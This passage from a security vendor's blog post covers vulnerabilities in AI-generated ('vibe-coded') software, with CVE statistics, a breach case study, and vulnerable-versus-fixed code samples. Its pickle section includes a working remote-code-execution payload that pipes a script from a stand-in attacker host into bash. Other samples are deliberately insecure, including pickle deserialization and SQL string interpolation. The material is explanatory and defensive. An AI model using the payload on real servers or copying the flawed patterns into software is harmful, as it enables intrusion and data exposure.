By the Security Research Team at Precogs.ai — March 2026
"A year ago, most developers used AI for autocomplete. Now people are vibe coding entire projects, shipping code they've barely read. That's a different risk profile entirely." — Hanqing Zhao, Georgia Tech SSLab, March 2026
Vibe coding is the most significant shift in software development in a generation. It is also, right now, producing a measurable, accelerating wave of exploitable vulnerabilities that are reaching production systems faster than any security team can track.
The numbers are no longer theoretical. In March 2026 alone, at least 35 new CVE entries were disclosed that were the direct result of AI-generated code — up from 6 in January and 15 in February. Security firm Tenzai tested 5 major AI coding tools by building 3 identical applications with each, and found 69 vulnerabilities across all 15 apps. Every single tool introduced Server-Side Request Forgery vulnerabilities. Zero apps built CSRF protection. Zero apps set security headers. Escape.tech scanned 5,600 publicly deployed vibe-coded applications and found 2,000+ vulnerabilities and 400+ exposed secrets.
This is not a warning about a future risk. This is a post-mortem on a crisis that is already happening — with real breaches, real CVEs, and real data sitting exposed on the internet right now because a founder trusted an AI assistant to build something production-safe and no one checked.
This blog is for every developer, security engineer, and engineering leader who is using AI coding tools, shipping AI-generated code, or responsible for a product where either of those is true. Which, in 2026, is nearly everyone.
Table of Contents
- What Is Vibe Coding — And Why Is It a Security Problem Now
- The Data: CVE Counts, Breach Numbers, and What They Actually Mean
- The Moltbook Incident: A Real Breach, Built Entirely by AI
- Why AI Tools Generate Insecure Code — The Structural Reasons
- The Pickle RCE: When a Snake Game Becomes a Backdoor
- Injection Flaws in AI-Generated Code: The Classics Never Die
- Broken Authentication and Authorization: The Most Common AI Failure
- The Hallucinated Package Problem: Supply Chain Attacks by Proxy
- Missing Security Headers: The Invisible Defaults
- SSRF in Every App: The 100% Failure Rate
- Business Logic Gaps: What AI Can Never Know
- The Amazon Incident: When Vibe Coding Hits Production at Scale
- How to Prompt Your AI for Secure Code
- How Precogs.ai Catches What Your AI Assistant Ships
- A Secure Vibe Coding Workflow
- Conclusion: The Vibe Is Not the Problem. The Gap Is.
1. What Is Vibe Coding — And Why Is It a Security Problem Now
When Andrej Karpathy coined the term "vibe coding" in February 2025, he described a state where developers "fully give in to the vibes" — describing what they want in natural language, accepting whatever the LLM generates, and shipping without deep review. Collins English Dictionary named it Word of the Year. Within little more than a year it moved from a curiosity to the dominant development paradigm for a significant fraction of the software being shipped in 2026.
The workflow is seductive in its simplicity:
Prompt: "Build me a REST API for a SaaS app with user registration,
login, subscription management via Stripe, and a dashboard
showing usage metrics. Use FastAPI and PostgreSQL."
→ AI generates ~2,000 lines of code in 30 seconds
→ Developer reviews: "Looks good, tests pass"
→ Code ships to production

The problem is not the speed. The problem is the gap between "tests pass" and "is secure." These are not the same thing — and AI coding tools generate entire applications from scratch in a black box: you don't see how the model weighs different implementation choices or what assumptions it makes about security. The code can bypass the review and testing workflows that catch problems in traditional development.
When a human developer writes a login function, every security decision is visible and explicit. When an AI writes it, those decisions are implicit — embedded in training data patterns that optimize for functionality, not security. AI coding tools can reproduce insecure patterns from training data or generate flawed logic under pressure to produce fast results, leading to injection flaws, weak authentication, broken authorization, and unsafe handling of sensitive data.
The shift that makes 2026 different from 2024 is not that AI-generated code became less secure. It is that the scale and autonomy changed. A year ago, developers used AI for autocomplete suggestions. Today, entire projects — authentication systems, payment integrations, database schemas, API layers — are being generated end-to-end and shipped with minimal human review. The risk profile is categorically different.
2. The Data: CVE Counts, Breach Numbers, and What They Actually Mean
Georgia Tech's Systems Software & Security Lab launched the Vibe Security Radar in May 2025 to track exactly this phenomenon. The methodology is rigorous: pull CVEs from public vulnerability databases, find the commit that fixed each vulnerability, trace backwards to find who introduced the bug, and flag it if the introducing commit has an AI tool's signature.
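To make that last step concrete, here is a minimal sketch of what signature detection can look like, assuming the commit that introduced a vulnerable line has already been located (for example via git blame on the fixing change). The trailer strings below are assumptions about what these tools typically emit, not a verified or exhaustive list.

# Hedged sketch: check an introducing commit for a coding-agent signature.
# Assumes the commit SHA was already traced back from the fix via git blame.
import subprocess

AI_SIGNATURES = (
    'Co-Authored-By: Claude',        # assumed Claude Code commit trailer
    'Generated with Claude Code',
    'Co-Authored-By: Devin',         # illustrative; exact trailers vary by tool
)

def introduced_by_ai(repo_path: str, commit_sha: str) -> bool:
    """Return True if the introducing commit carries a known AI-tool signature."""
    message = subprocess.run(
        ['git', '-C', repo_path, 'show', '-s', '--format=%B', commit_sha],
        capture_output=True, text=True, check=True,
    ).stdout
    return any(sig.lower() in message.lower() for sig in AI_SIGNATURES)

A check like this misses every tool that leaves no commit annotation at all, which is exactly why the confirmed count is a floor rather than a ceiling.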
As of March 20, 2026, the CVE scorecard reads 74 CVEs attributable to AI-authored code, out of 43,849 advisories analyzed. In March 2026 alone: 27 CVEs authored by Claude Code, 4 by GitHub Copilot, 2 by Devin, and 1 each by Aether and Cursor.
Claude Code's prominence in these numbers requires context: its overrepresentation appears to follow from its recent surge in popularity and the fact that it always leaves a signature in its commits. Inline-suggestion tools like Copilot leave no trace at all, so their contributions are far harder to attribute.
The 74 confirmed CVEs are almost certainly a massive undercount. Georgia Tech researcher Hanqing Zhao estimates the real number is likely 5 to 10 times higher than what the lab currently detects — roughly 400 to 700 cases across the open-source ecosystem. Take OpenClaw as an example: it has more than 300 security advisories and appears to have been heavily vibe-coded, but most AI traces have been stripped away, so only around 20 cases can be confidently confirmed with clear AI signals.
Beyond CVEs, the picture from application scanning is even more alarming:
- Carnegie Mellon found that 61% of AI-generated code is functionally correct but only 10.5% is fully secure
- CodeRabbit's December 2025 study found vibe-coded PRs produced 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request
- Escape.tech discovered 2,000+ vulnerabilities and 400+ exposed secrets in 5,600 publicly deployed vibe-coded applications
3. The Moltbook Incident: A Real Breach, Built Entirely by AI
Theory becomes real with Moltbook — and this case study should be required reading for every founder using vibe coding tools.
In February 2026, Moltbook — a social networking site for AI agents — made international security news. The entire platform had been built through vibe coding. The founder publicly said he wrote zero lines of code himself. Security firm Wiz discovered a misconfigured Supabase database that had been left with public read and write access. The exposure included 1.5 million authentication tokens and 35,000 email addresses — all wide open to the internet.
The root cause was not a sophisticated attack. The AI scaffolded the database with permissive settings during development and the founder — who hadn't reviewed the infrastructure code — deployed it as-is.
This is the accountability gap that defines the vibe coding security crisis. When a vulnerability is found six months later in AI-generated code, there's no author to ask "why did you do it this way?" — because no human made that decision. The AI did. And the AI doesn't document its reasoning.
The specific failure in Moltbook's case was a Supabase Row Level Security configuration:
-- What the AI generated (DANGEROUS default):
-- No RLS policies created. Table accessible to anon role by default.
CREATE TABLE user_sessions (
  id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
  user_id UUID REFERENCES users(id),
  token TEXT NOT NULL,
  created_at TIMESTAMPTZ DEFAULT NOW()
);

-- Supabase's anon key has SELECT access to all tables without RLS policies
-- Result: 1.5 million session tokens readable by anyone with the anon key

-- What it should have looked like:

-- Enable Row Level Security immediately
ALTER TABLE user_sessions ENABLE ROW LEVEL SECURITY;

-- Users can only read their own sessions
CREATE POLICY "Users can view own sessions"
  ON user_sessions FOR SELECT
  USING (auth.uid() = user_id);

-- Service role only for writes
CREATE POLICY "Service role can insert sessions"
  ON user_sessions FOR INSERT
  WITH CHECK (auth.role() = 'service_role');

The AI generated a working session management system. It did not generate a secure one. And without a developer who understood Supabase's security model, the difference was invisible until Wiz's scanner found it.
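To see what "readable by anyone with the anon key" means in practice, here is a hedged sketch of the request an attacker, or a scanner like Wiz's, could have made against the exposed table. Supabase serves tables through a PostgREST-style REST endpoint; the project URL and key below are placeholders, not Moltbook's real values.

# Hedged sketch: reading a Supabase table with only the public anon key.
import requests

SUPABASE_URL = "https://YOUR-PROJECT.supabase.co"   # placeholder project URL
ANON_KEY = "eyJ..."   # the *public* anon key that ships to every browser client

resp = requests.get(
    f"{SUPABASE_URL}/rest/v1/user_sessions",
    params={"select": "user_id,token"},
    headers={"apikey": ANON_KEY, "Authorization": f"Bearer {ANON_KEY}"},
    timeout=10,
)
# With no RLS on the table, this returns every row: 1.5 million tokens in Moltbook's case.
# With the policies above enabled, the same request comes back as an empty list.
print(resp.status_code, len(resp.json()))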
4. Why AI Tools Generate Insecure Code — The Structural Reasons
Understanding why AI coding tools produce insecure code is essential to knowing where to look for the problems they introduce.
4.1 Training Data Reflects the Internet — Which Is Insecure
AI coding models are trained on vast corpora of public code. The internet is full of tutorials, Stack Overflow answers, and example code that prioritizes getting something working quickly over getting it working securely. Insecure patterns — SQL string concatenation, hardcoded secrets in examples, missing input validation in tutorials — are well-represented in training data. The model learns to produce outputs that look like the code it was trained on.
4.2 Optimization Target Is Functionality, Not Security
Vibe coding optimizes for features, not permissions. Access control is an architectural decision that gets made implicitly by the AI — and those implicit decisions are often wrong. The model is evaluated on "does this code work?" not "is this code secure?" These are different evaluation criteria with different outputs.
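Here is what that implicit decision looks like in code. This is a minimal Flask sketch with an in-memory store and a stand-in current_user_id() helper; the ownership check near the end is the line AI-generated handlers routinely leave out, because nothing in the feature request asks for it.

# Hedged sketch: the access-control decision vibe coding tends to skip.
from flask import Flask, abort, jsonify, request

app = Flask(__name__)
INVOICES = {1: {'id': 1, 'owner_id': 'alice', 'total': 120.0}}   # stand-in data layer

def current_user_id() -> str:
    # Stand-in for real session handling; assume this returns the authenticated user
    return request.headers.get('X-Demo-User', 'anonymous')

@app.route('/api/invoices/<int:invoice_id>')
def get_invoice(invoice_id):
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        abort(404)
    # The implicit architectural decision: who may read this record?
    # Omit these two lines and the feature still works, and any logged-in
    # user can enumerate everyone's invoices (classic IDOR / BOLA).
    if invoice['owner_id'] != current_user_id():
        abort(403)
    return jsonify(invoice)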
4.3 No Business Context
AI has no knowledge of your specific threat model, your user base's risk profile, your regulatory requirements, or your business logic invariants. Because AI lacks an understanding of your specific business logic, it can build applications that technically work but violate domain rules, regulatory requirements, or customer trust.
4.4 Security Is Often Invisible to the Model
Many security properties are defined by what's absent — a missing rate limit, a missing ownership check, a missing CSRF token, a missing security header. AI models are better at generating present things than noticing absent things. The generated code looks complete because it has all the features. The security holes are invisible because there's nothing to see.
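A password-reset endpoint makes the point concrete. The sketch below (Flask, a deliberately naive in-memory rate limiter, and a hypothetical mail helper left commented out) makes the normally absent lines visible; delete the checks and the endpoint still looks complete and still passes its tests.

# Hedged sketch: the "absent" defenses made visible on one endpoint.
import time
from collections import defaultdict
from flask import Flask, abort, jsonify, request

app = Flask(__name__)
_attempts = defaultdict(list)   # naive in-memory rate-limit state, sketch only

def rate_limited(key: str, max_per_hour: int = 5) -> bool:
    now = time.time()
    _attempts[key] = [t for t in _attempts[key] if now - t < 3600]
    if len(_attempts[key]) >= max_per_hour:
        return True
    _attempts[key].append(now)
    return False

@app.route('/api/password-reset', methods=['POST'])
def password_reset():
    if rate_limited(request.remote_addr):
        abort(429)   # absent by default: rate limiting
    email = (request.get_json(silent=True) or {}).get('email', '')
    if '@' not in email:
        abort(400)   # absent by default: input validation
    # send_reset_email(email)   # hypothetical mail helper, omitted in this sketch
    return jsonify({'status': 'sent'})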
4.5 The "Looks Good" Trap
AI-generated code is syntactically clean, well-structured, and passes basic linting. It looks more professional than hastily written human code. This creates a cognitive trap where developers extend more trust to it than it deserves. A messy function written by a junior developer triggers review instincts. A beautifully formatted AI-generated function lulls them to sleep.
5. The Pickle RCE: When a Snake Game Becomes a Backdoor
The Databricks AI Red Team's Snake game experiment is one of the most illustrative examples of how vibe coding produces invisible vulnerabilities.
When they asked Claude to build a multiplayer snake game, the AI-generated network layer used Python's pickle module to serialize and deserialize game objects — a module notorious for enabling arbitrary remote code execution. The app ran perfectly. The vulnerability was invisible to anyone who didn't already know about pickle exploits.
Here is exactly what the AI generated and why it is catastrophic:
# AI-generated multiplayer Snake game network layer
# DANGEROUS: pickle used for network serialization
import socket
import pickle
import threading

class GameServer:
    def __init__(self, host='0.0.0.0', port=9999):
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind((host, port))
        self.server.listen(5)
        self.players = {}

    def handle_client(self, conn, addr):
        while True:
            data = conn.recv(4096)
            if not data:
                break
            # CRITICAL VULNERABILITY: Deserializing untrusted network data with pickle
            # Any connected client can send a crafted payload for RCE
            game_state = pickle.loads(data)  # ← Arbitrary code execution here
            self.update_game(game_state)

    def send_state(self, conn, state):
        conn.sendall(pickle.dumps(state))  # ← Equally dangerous for whichever side unpickles it

An attacker who can connect to this game server — which listens on 0.0.0.0, meaning all interfaces — can send a crafted pickle payload:
# Attacker's exploit: craft a malicious pickle payload
import pickle
import os
import socket

class RCEPayload:
    def __reduce__(self):
        # This executes on the SERVER when pickle.loads() is called
        return (os.system, ("curl http://attacker.com/shell.sh | bash",))

# Serialize the malicious payload
malicious_data = pickle.dumps(RCEPayload())

# Send to game server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target-game-server.com', 9999))
sock.sendall(malicious_data)

# Server executes: curl http://attacker.com/shell.sh | bash
# Full remote code execution achieved

The fix is trivial — use JSON instead of pickle for network serialization:
# SAFE: JSON serialization for network data
import json

class GameServer:
    def handle_client(self, conn, addr):
        while True:
            data = conn.recv(4096)
            if not data:
                break
            try:
                # JSON cannot execute arbitrary code on deserialization
                game_state = json.loads(data.decode('utf-8'))
                # Validate the structure before processing
                if not self._validate_game_state(game_state):
                    continue
                self.update_game(game_state)
            except (json.JSONDecodeError, KeyError, ValueError):
                continue  # Reject malformed input

    def _validate_game_state(self, state: dict) -> bool:
        required_keys = {'player_id', 'direction', 'position'}
        return (
            isinstance(state, dict) and
            required_keys.issubset(state.keys()) and
            state['direction'] in ('up', 'down', 'left', 'right')
        )

The fix was simple — switch from pickle to JSON — but only because the team caught the issue during review. This is the vibe coding security gap in its purest form: the AI produced working code, and the working code was also a perfect RCE backdoor. Without that review, it ships, and any malicious client can execute arbitrary code on the game server.
6. Injection Flaws in AI-Generated Code: The Classics Never Die
Ask a model to generate a login function, and you may receive something syntactically perfect, yet riddled with flaws — from hardcoded credentials to unvalidated inputs. A session cookie without the HttpOnly or Secure flag is an open invitation for hijacking. A dynamic SQL query built from unchecked user input is a textbook example of an injection vulnerability.
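The cookie flags, at least, are a few lines of explicit configuration. A minimal sketch in Flask follows; these are real Flask config keys, and the values shown are a reasonable baseline rather than a universal recommendation.

# Hedged sketch: making the session-cookie decisions explicit in Flask.
from flask import Flask

app = Flask(__name__)
app.config.update(
    SESSION_COOKIE_HTTPONLY=True,     # JavaScript cannot read the session cookie
    SESSION_COOKIE_SECURE=True,       # cookie is only sent over HTTPS
    SESSION_COOKIE_SAMESITE="Lax",    # limits cross-site sends of the cookie
    PERMANENT_SESSION_LIFETIME=3600,  # cap session lifetime to one hour (seconds)
)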
6.1 SQL Injection — Still Appearing in AI Code in 2026
# What AI tools frequently generate for search endpoints:
@app.route('/api/search')
def search_users():
    query = request.args.get('q', '')
    # DANGEROUS: String interpolation directly into SQL
    sql = f"SELECT id, name, email FROM users WHERE name LIKE '%{query}%'"
    results = db.execute(sql).fetchall()
    return jsonify([dict(r) for r in results])